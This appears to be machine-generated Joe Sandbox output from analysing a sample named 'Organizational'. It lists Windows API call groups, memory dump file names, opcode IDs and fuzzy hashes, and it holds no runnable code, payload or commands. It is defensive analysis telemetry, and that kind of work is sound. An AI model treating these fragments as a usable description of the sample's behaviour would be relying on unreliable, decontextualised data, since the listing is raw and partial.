                                                          • Instruction Fuzzy Hash: 9731DF31900219EFDF14CFA9D98CA9E3BB9EF46715F104218F924AB1D0C7B099A4CB90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DB804
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB829
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB841
                                                          • GetSystemMetrics.USER32(00000004), ref: 002DB86A
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C155C,00000000), ref: 002DB888
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: cd6c2c6c2abdb622f548e58e68fb56e32656e9ef6171dbcb5cc03f86d6925473
                                                          • Instruction ID: da1bc38e21f44b8788b5c824dcbc3dff4621ecb6d8a3b26f8ad0a3e8351b881b
                                                          • Opcode Fuzzy Hash: cd6c2c6c2abdb622f548e58e68fb56e32656e9ef6171dbcb5cc03f86d6925473
                                                          • Instruction Fuzzy Hash: EE21B431924256EFCB169F38DC58B6937A8FB09320F16472AF921D72E0D7708C61DB90
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 002C6159
                                                          • GetForegroundWindow.USER32 ref: 002C6170
                                                          • GetDC.USER32(00000000), ref: 002C61AC
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 002C61B8
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 002C61F3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: fe5e648d505f711104fabcd1602d55594a860c71579fa3b445b3aaa5998d9fc9
                                                          • Instruction ID: a2f253f53ec93ebd3bc2f6a2e8326bb390aa2986fe6f693f2727fc84ae67b6c8
                                                          • Opcode Fuzzy Hash: fe5e648d505f711104fabcd1602d55594a860c71579fa3b445b3aaa5998d9fc9
                                                          • Instruction Fuzzy Hash: E521A475A102049FD704EF64DCC8FAABBF9EF48311F048469E84A97352CA70AC55CF90
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                          • SelectObject.GDI32(?,00000000), ref: 00251738
                                                          • BeginPath.GDI32(?), ref: 0025174F
                                                          • SelectObject.GDI32(?,00000000), ref: 00251778
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 622c6dee9eb8d70f813ac8f88b1b0d53909ee3c3400724b7e608e9f242a6a383
                                                          • Instruction ID: e03d82764ab9608b97788baa91e3e778aafb7e5f8d630e6f16517d1bc1acefb9
                                                          • Opcode Fuzzy Hash: 622c6dee9eb8d70f813ac8f88b1b0d53909ee3c3400724b7e608e9f242a6a383
                                                          • Instruction Fuzzy Hash: 9821A730825209EFDB129F58EC8D7E97BBDF708312F188215F815961A0D7B199B6CF54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: dd555e8c9e36884f632a68b974c00483ee7b87cedca7a0aa8e9e12cb479bd1af
                                                          • Instruction ID: 9c76ee5e9cbfd686fb58791bd528f1a2e223e7048371858711de71449b346df7
                                                          • Opcode Fuzzy Hash: dd555e8c9e36884f632a68b974c00483ee7b87cedca7a0aa8e9e12cb479bd1af
                                                          • Instruction Fuzzy Hash: 2701D6726701093FD211A5159C46FAB635CAF23384F348025FE0AA7241EBA8DE3086E0
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 002B5075
                                                          • __beginthreadex.LIBCMT ref: 002B5093
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 002B50A8
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B50BE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B50C5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: dff64fe794f77e72768c99976e1999dc707432e19015557a9761c8838be4f225
                                                          • Instruction ID: 19136b6d11da7d97ac48b356b62595304f3c5790029ac27fa6f546cdc5990dd2
                                                          • Opcode Fuzzy Hash: dff64fe794f77e72768c99976e1999dc707432e19015557a9761c8838be4f225
                                                          • Instruction Fuzzy Hash: 5C114C729146587FC7019FA8AC48BDB7BACAB49320F144655F814DB350D2B1895187F0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
                                                          • GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
                                                          • HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 0442d75f4b92f192b53f2f023e01941c9e8634ecfebe4a1db27eabde29711448
                                                          • Instruction ID: f1f1eef0e235d92f2fa07398cf97198d7ed2a90521c6c326335401bbb6cd2838
                                                          • Opcode Fuzzy Hash: 0442d75f4b92f192b53f2f023e01941c9e8634ecfebe4a1db27eabde29711448
                                                          • Instruction Fuzzy Hash: 02014B70650245EFDB204FA5EDCCD6B7BADEF8A354B140569F849CA220DA719C51CA60
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B581B
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5829
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5831
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B583B
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5877
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 040c1319c41c754775b3605f53eac3a367bbb7efbd0bef09ea5be7bea3d35547
                                                          • Instruction ID: 0b573568ff75e247687e25e2e4e15468ca0c5506076dcc7a0553a9f230026755
                                                          • Opcode Fuzzy Hash: 040c1319c41c754775b3605f53eac3a367bbb7efbd0bef09ea5be7bea3d35547
                                                          • Instruction Fuzzy Hash: 4A016931C11A2DDBDF00AFE8E88CAEDBBB8FB0C751F004156E905BA140CB7095A1CBA1
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?,?,002A8073), ref: 002A7D45
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D60
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D6E
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?), ref: 002A7D7E
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D8A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 110be607b3d9ac522b576ade084460e704934c37b81a2f510f9a7c62e4c68dd7
                                                          • Instruction ID: a760c4b3e7352e75df56cec8aeeea3b63184e1c7a0c23a557f5bbd5ef4fcfad9
                                                          • Opcode Fuzzy Hash: 110be607b3d9ac522b576ade084460e704934c37b81a2f510f9a7c62e4c68dd7
                                                          • Instruction Fuzzy Hash: 0101DF72621615BBDB108F54EC88BAA7BADEF85752F104024FC08DA210DBB5ED50CBE4
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8CDE
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8CE8
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8CF7
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8CFE
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A8D14
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: bf5dc806e9f8f75f8c5b6df178dcb4f6c2d1893e579d5a04bb0243320e65c8e5
                                                          • Instruction ID: c901a5f5e796575e0178737fe5d77f029755166e47cdcb03e9547e5043d98961
                                                          • Opcode Fuzzy Hash: bf5dc806e9f8f75f8c5b6df178dcb4f6c2d1893e579d5a04bb0243320e65c8e5
                                                          • Instruction Fuzzy Hash: 2EF0AF30250205AFEB100FF4ECCCE673BACEF8A754B104029F944CA190DEA0AC92DB60
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8D3F
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D49
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D58
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D5F
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D75
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 87af34f6aab43251b31d59c269c890f68bfe678d76cd868d670759dd01822233
                                                          • Instruction ID: b71420154757afef23e2abe03036bc349fe8802b9b799445c313f28f5c64e39e
                                                          • Opcode Fuzzy Hash: 87af34f6aab43251b31d59c269c890f68bfe678d76cd868d670759dd01822233
                                                          • Instruction Fuzzy Hash: D5F08C30290245AFEB110FA4ECCCF673BACEF9AB54F040129F9448A190CEA09D92DA60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACD90
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 002ACDA7
                                                          • MessageBeep.USER32(00000000), ref: 002ACDBF
                                                          • KillTimer.USER32(?,0000040A), ref: 002ACDDB
                                                          • EndDialog.USER32(?,00000001), ref: 002ACDF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 6e2e6201a735bd6cbb8f878492824c51463301873f204ab757c81c92927f6cbd
                                                          • Instruction ID: 2e25f3023867a421c0e36a1c5e5566803706244929a939f1b6cee08169b2bfc4
                                                          • Opcode Fuzzy Hash: 6e2e6201a735bd6cbb8f878492824c51463301873f204ab757c81c92927f6cbd
                                                          • Instruction Fuzzy Hash: 6901A230550B04ABEB205F60ECCEFA67B7CFB01701F000669A582A50E1DBE0A9A58A90
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 0025179B
                                                          • StrokeAndFillPath.GDI32(?,?,0028BBC9,00000000,?), ref: 002517B7
                                                          • SelectObject.GDI32(?,00000000), ref: 002517CA
                                                          • DeleteObject.GDI32 ref: 002517DD
                                                          • StrokePath.GDI32(?), ref: 002517F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 64791a82b382796d9294d862385adc5412c8e9286dae9798e4aad91738ef7883
                                                          • Instruction ID: f9ffa5be2b9b4509a8573cd0dfb56037e66ed66a6ce90008edbe675f9a5c59c2
                                                          • Opcode Fuzzy Hash: 64791a82b382796d9294d862385adc5412c8e9286dae9798e4aad91738ef7883
                                                          • Instruction Fuzzy Hash: CCF01930058249ABDB225F29EC8D7987BB9A708322F08C214F829481F0D77549AADF14
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 002BCA75
                                                          • CoCreateInstance.OLE32(002E3D3C,00000000,00000001,002E3BAC,?), ref: 002BCA8D
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • CoUninitialize.OLE32 ref: 002BCCFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 8a07547cd49e7bc56de865c0503bf64b50c765d37a3256cc0a3a544854f2a97c
                                                          • Instruction ID: f78ef3dfcf6e8acdebff126202c3e1b40a576c5c15d5ab8026b30465ecdc71e3
                                                          • Opcode Fuzzy Hash: 8a07547cd49e7bc56de865c0503bf64b50c765d37a3256cc0a3a544854f2a97c
                                                          • Instruction Fuzzy Hash: 13A16A71114205AFD300EF64C881EAFB7E8EF98349F00495DF555972A2EB70EA99CF92
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 00261680: _memmove.LIBCMT ref: 002616DB
                                                          • __swprintf.LIBCMT ref: 0025E598
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0025E431
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: a23f5e1c26b24ae4ab6eb7944845762945388370e45f98b925a6486654155a57
                                                          • Instruction ID: 4b06edbfeb774c7202df022259081ecb93f1605e9d8cc327d5801b28f0808213
                                                          • Opcode Fuzzy Hash: a23f5e1c26b24ae4ab6eb7944845762945388370e45f98b925a6486654155a57
                                                          • Instruction Fuzzy Hash: 1E91C1715342119FCB18EF24C895C6EB7A8EF95304F44491DF886972A1EB30EE68CF96
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 002752CD
                                                            • Part of subcall function 00280320: __87except.LIBCMT ref: 0028035B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: dcb7381c8e88e654309ade6ec763192a1d764253ba664793a3f773f6c578c878
                                                          • Instruction ID: 7a654faec07186c61c4c1dd84127b86c8d63decd9d21dcab200155beb95a6a4f
                                                          • Opcode Fuzzy Hash: dcb7381c8e88e654309ade6ec763192a1d764253ba664793a3f773f6c578c878
                                                          • Instruction Fuzzy Hash: 94518D25E3AA0387CB517F14C98136AA7949B41750F30CC99E4DD861E6EFF48CF89B42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: 6f3f6a0b6232016075af3a89584e4aa97179fcfb2b5ead4124cc2bb74a72e7e2
                                                          • Instruction ID: ee32896fd4a983ec540351076d8c85a38b05a73467aeccdd0c102e9f8a0aff1c
                                                          • Opcode Fuzzy Hash: 6f3f6a0b6232016075af3a89584e4aa97179fcfb2b5ead4124cc2bb74a72e7e2
                                                          • Instruction Fuzzy Hash: 99514975520256CFDF15DF68C488AFABBA8EF56310F184055FC959B290CB34ACBACB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
